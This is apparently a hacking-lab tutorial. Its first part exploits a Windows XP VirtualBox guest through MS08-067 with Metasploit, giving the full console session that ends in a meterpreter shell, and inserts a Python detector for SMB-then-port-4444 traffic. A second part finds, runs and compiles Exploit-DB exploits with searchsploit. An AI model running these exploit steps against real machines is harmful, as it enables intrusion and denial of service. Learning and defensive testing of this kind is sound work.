EXPLOITING WINDOWS XP IN VIRTUALBOX USING METASPLOIT

Information Gathering and Service Enumeration

First of all, we check connectivity between Windows XP and BackTrack.
Type the command ping 192.168.43.1 to reach BackTrack.

Type the command ping 192.168.43.3 to reach Windows XP.

Next, open Zenmap for more detailed information gathering. We use the auto scan, which shows what services are running.



Auto Scan

For vulnerability assessment I use Nessus, in the same way I posted before: open Nessus, click Scan, click Add and enter a name, then change the policy to Internal Network Scans and set the scan target to 192.168.43.0/24.
After the scan completes, the result appears as shown below.

Next we choose the IP 192.168.43.3.




Here I chose MS08-067, Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution.

There are two vulnerabilities. To view them, export and download the report in HTML format; it lists the host 192.168.43.3, and clicking it displays the vulnerability marked in red.

Next, in a console, type msfconsole.

Next, select the module and set the payload and target host. The first attempts below fail because the exploit module name was entered as the payload; the exploit succeeds once a real payload, windows/meterpreter/bind_tcp, is set.

msf > use      windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > windows/smb/ms08_067_netapi RHOST=192.168.43.3 p
[-] Unknown command: windows/smb/ms08_067_netapi.
msf  exploit(ms08_067_netapi) > windows/smb/ms08_067_netapi RHOST=192.168.43.3
[-] Unknown command: windows/smb/ms08_067_netapi.
msf  exploit(ms08_067_netapi) > payload rhost 192.168.43.3
[-] Unknown command: payload.
msf  exploit(ms08_067_netapi) > set payload windows/smb/ms08_067_netapi
payload => windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set rhost 192.168.43.3
rhost => 192.168.43.3
msf  exploit(ms08_067_netapi) > exploit

[-] Exploit failed: undefined method `assoc_exploit=' for #<#<Module:0x8cb7688>::Metasploit3:0xd4f1228>
msf  exploit(ms08_067_netapi) > exploit

[-] Exploit failed: undefined method `assoc_exploit=' for #<#<Module:0x8cb7688>::Metasploit3:0xd433d90>
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_
set payload windows/meterpreter/bind_ipv6_tcp  set payload windows/meterpreter/bind_nonx_tcp  set payload windows/meterpreter/bind_tcp      
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_
set payload windows/meterpreter/bind_ipv6_tcp  set payload windows/meterpreter/bind_nonx_tcp  set payload windows/meterpreter/bind_tcp      
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > set rhost 192.168.43.3
rhost => 192.168.43.3
msf  exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.43.3
[*] Meterpreter session 1 opened (192.168.43.1:56817 -> 192.168.43.3:4444) at 2012-01-28 06:39:25 +0700

meterpreter > dir
[-] Unknown command: dir.
meterpreter > ls

Listing: C:\WINDOWS\system32
============================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100444/r--r--r--  6656      fil   2008-04-15 00:30:00 +0700  KBDAL.DLL
100444/r--r--r--  749       fil   2012-01-24 07:57:53 +0700  sapi.cpl.manifest
100444/r--r--r--  44451     fil   2008-04-15 00:30:00 +0700  rsop.msc
100444/r--r--r--  58273     fil   2008-04-15 00:30:00 +0700  perfmon.msc
100444/r--r--r--  749       fil   2012-01-24 07:57:53 +0700  nwc.cpl.manifest
100444/r--r--r--  749       fil   2012-01-24 07:57:53 +0700  ncpa.cpl.manifest
100444/r--r--r--  488       fil   2012-01-24 07:57:59 +0700  logonui.exe.manifest
100444/r--r--r--  6656      fil   2008-04-15 00:30:00 +0700  kbdycl.dll
100444/r--r--r--  5632      fil   2008-04-15 00:30:00 +0700  kbdycc.dll
100444/r--r--r--  5632      fil   2008-04-15 00:30:00 +0700  kbduzb.dll
100444/r--r--r--  5632      fil   2008-04-15 00:30:00 +0700  kbdur.dll
100444/r--r--r--  6144      fil   2008-04-15 00:30:00 +0700  kbdtuq.dll
100444/r--r--r--  6144      fil   2008-04-15 00:30:00 +0700  kbdtuf.dll
100444/r--r--r--  5632      fil   2008-04-15 00:30:00 +0700  kbdtat.dll
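As an added example (not part of the original write-up), this Python script shows the defender's view of the session above: an SMB connection on port 445 to the target, followed within seconds by a connection to port 4444, Metasploit's default handler port used by the bind_tcp stager. The firewall log format, the timestamps and the 60-second window are assumptions; the log lines are constructed from the addresses and time seen in the session.

```python
import re
from datetime import datetime, timedelta

# Constructed firewall log lines (assumed format) modelled on the lab session:
# the attacker host 192.168.43.1 talks SMB (445) to 192.168.43.3, then connects
# to the bind_tcp stager on 4444 fourteen seconds later. The second host pair
# is a benign control: its 4444 connection comes long after its SMB traffic.
SAMPLE_LOG = """\
2012-01-28 06:39:10 ACCEPT tcp 192.168.43.1:56790 -> 192.168.43.3:445
2012-01-28 06:39:11 ACCEPT tcp 192.168.43.1:56791 -> 192.168.43.3:445
2012-01-28 06:39:25 ACCEPT tcp 192.168.43.1:56817 -> 192.168.43.3:4444
2012-01-28 06:40:02 ACCEPT tcp 192.168.43.5:50010 -> 192.168.43.3:445
2012-01-28 06:55:30 ACCEPT tcp 192.168.43.5:50011 -> 192.168.43.3:4444
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) ACCEPT tcp (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)
SMB_PORT = 445
STAGER_PORTS = {4444}          # Metasploit default LPORT for bind/reverse handlers
WINDOW = timedelta(seconds=60)  # assumed correlation window

def parse(log_text):
    """Yield (timestamp, src, dst, dport) for each parseable line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            yield ts, m["src"], m["dst"], int(m["dport"])

def find_smb_then_stager(log_text, window=WINDOW):
    """Return one alert per (src, dst) pair where SMB traffic is followed,
    within `window`, by a connection to a stager port on the same host."""
    last_smb = {}  # (src, dst) -> time of the most recent SMB connection
    alerts = []
    for ts, src, dst, dport in parse(log_text):
        key = (src, dst)
        if dport == SMB_PORT:
            last_smb[key] = ts
        elif dport in STAGER_PORTS and key in last_smb:
            delay = ts - last_smb[key]
            if delay <= window:
                alerts.append({"src": src, "dst": dst, "port": dport,
                               "seconds_after_smb": int(delay.total_seconds())})
    return alerts

if __name__ == "__main__":
    for a in find_smb_then_stager(SAMPLE_LOG):
        print(f"ALERT: {a['src']} -> {a['dst']}:{a['port']} "
              f"{a['seconds_after_smb']}s after SMB traffic")
```

The same correlation applies to reverse-shell payloads if the stager port set is extended with the ports your handlers would never legitimately use.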



GOOD LUCK

VULNERABILITY ASSESSMENT SCAN USING NESSUS

Vulnerability Identification

First, open Nessus and log in.
Next click Scan, click Add, enter a name and the IP address, then click Launch Scan.
Wait for the scan to finish.
After the scan has finished,

we can select the IP we want to exploit.
For example, here I chose the host rated highest, as its vulnerability is the easiest to note.



After that it appears like the image below.



From the picture above we can identify the vulnerability by its SVC Name.


In the picture above there are two vulnerabilities; here I choose Windows NetBIOS / SMB Remote Host Information Disclosure.

Then download the report.
EXPLOITATION


Now we open the Exploit-DB search (searchsploit).


Type the command ./searchsploit, then ./searchsploit smb for the service we selected earlier in Nessus.
To list the exploit directories, type ls, then ls platforms.
If the exploit is a .py file, run it with the command python platforms/multiple/dos/1761.py.
To read a text file, type cat platforms/multiple/13906.txt.
To compile a .c exploit into an executable, type gcc platforms/windows/remote/13330.c -o black_devil (without -c, which would only produce an object file).


 GOOD LUCK